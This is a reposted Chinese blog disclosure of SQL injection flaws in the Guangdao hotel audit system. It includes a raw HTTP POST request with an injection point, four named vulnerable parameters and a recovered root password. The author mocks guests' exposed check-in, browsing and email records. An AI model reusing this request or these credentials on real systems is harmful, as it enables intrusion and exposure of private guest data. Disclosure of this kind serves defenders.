广道审计系统SQL注入漏洞可致敏感信息泄露 – 网

时间: 2020-10-10|tag: 45次围观|0 条评论

广道审计系统
公司为:深圳市高新技术有限公司

广道审计系统SQL注入漏洞可致敏感信息泄露 – 网插图

广道审计系统

公司为:深圳市高新技术有限公司

有较多酒店系统采用。
 

广道审计系统SQL注入漏洞可致敏感信息泄露 – 网插图1

该硬件审计系统某页面由于未做过滤,导致存在N个SQL注入漏洞

其中参数为:Idcard ,mobile ,password ,room

 

上面4个SQL注入漏洞,我选取其中一个注入做为例子


POST /pass.php HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.100.235:1234/index.php
Cookie: PHPSESSID=2d93e8aa3df024e3942c0ff3a11fbad7
Host: 192.168.100.235:1234
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

button=1&guest_name=ucvbadlr&idcard=1&mobile=**&password=&type=4

广道审计系统SQL注入漏洞可致敏感信息泄露 – 网插图2

 

广道审计系统SQL注入漏洞可致敏感信息泄露 – 网插图3

 

广道审计系统SQL注入漏洞可致敏感信息泄露 – 网插图4

root密码解密为: root123
 

广道审计系统SQL注入漏洞可致敏感信息泄露 – 网插图5

 

广道审计系统SQL注入漏洞可致敏感信息泄露 – 网插图6

 

广道审计系统SQL注入漏洞可致敏感信息泄露 – 网插图7

看看这些开房的
 

广道审计系统SQL注入漏洞可致敏感信息泄露 – 网插图8

看看你上过的哪些网页
 

广道审计系统SQL注入漏洞可致敏感信息泄露 – 网插图9

下载记录
 

广道审计系统SQL注入漏洞可致敏感信息泄露 – 网插图10

是所有监控上网记录。
 

广道审计系统SQL注入漏洞可致敏感信息泄露 – 网插图11

 

广道审计系统SQL注入漏洞可致敏感信息泄露 – 网插图12

还有大量邮箱。。。
 

广道审计系统SQL注入漏洞可致敏感信息泄露 – 网插图13

看看你在酒店下载过什么片?(快播) 看看你提交了哪些post请求。。。。
 

广道审计系统SQL注入漏洞可致敏感信息泄露 – 网插图14

 

广道审计系统SQL注入漏洞可致敏感信息泄露 – 网插图15

 

漏洞证明:

 

广道审计系统SQL注入漏洞可致敏感信息泄露 – 网插图14

 

广道审计系统SQL注入漏洞可致敏感信息泄露 – 网插图15
    上一篇: 大朴网越权之取消任意用户订单 - 网站安全 - 自

    下一篇: 淘宝官网某处接口泄露用户淘宝ID和部分COOKIE -
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《广道审计系统SQL注入漏洞可致敏感信息泄露 – 网
   

还没有人抢沙发呢~